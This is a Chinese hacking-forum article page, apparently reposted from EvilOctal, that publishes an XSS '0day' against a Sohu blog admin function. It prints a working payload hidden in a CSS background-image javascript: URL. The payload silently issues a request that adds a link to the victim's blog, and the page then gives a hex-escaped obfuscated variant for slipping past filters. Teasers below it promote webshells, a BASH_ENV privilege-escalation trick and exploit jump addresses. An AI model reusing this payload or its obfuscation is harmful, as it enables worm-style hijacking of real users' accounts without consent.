XSS 0DAY代码
所属分类:
实用技巧 / 安全教程
阅读数:
797
收藏 0赞 0分享
文章作者:茄子宝
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
看到梦之光芒放出来了!我也不藏了!
10月7日的时候我就发的日志,提示了大家!这里算是上次发的XSS WORM初尝试的续吧.
其实很简单,就是两次转码.
<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">
ASCII转码参考 http://s0n9.blog.sohu.com/16002288.html
写成下面16进制转义字符串
<div style="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0065\0076\0061\006C\0028\0053\0074\0072\0069\006E\0067\002E\0066\0072\006F\006D\0043\0068\0061\0072\0043\006F\006......"></div>
非常不错的脚本入侵基础知识总结第1/2页
简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。
收藏 0赞 0分享
linux提权用的一个技巧
一个linux提权用的技巧,放出来全当找工作攒RP了。 OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本
收藏 0赞 0分享
一些通用跳转地址,XXOXX的时候有点用
近日在写exploit的时候需要用到一些其他语言的call ebx的跳转地址,但是metasploit的opcode DB没有包括繁体中文、日文、韩文机器的跳转地址,所以费了点时间收集了下,在这里要感谢傲少提供的机器给我去找地址。现在贴到这里,方便大家。
收藏 0赞 0分享
入侵过程中用过的三大门派的几个小工具[推荐]
vbs在入侵中的作用、我在入侵中的注意的细节、跨站、入侵中的批处理、入侵过程中用的小工具共有这五个,当然随着期数的变化,出的题目也会增加,现在大家针对这些题目欢迎来稿呀,不要被高手这两个字吓住了。
收藏 0赞 0分享
查看更多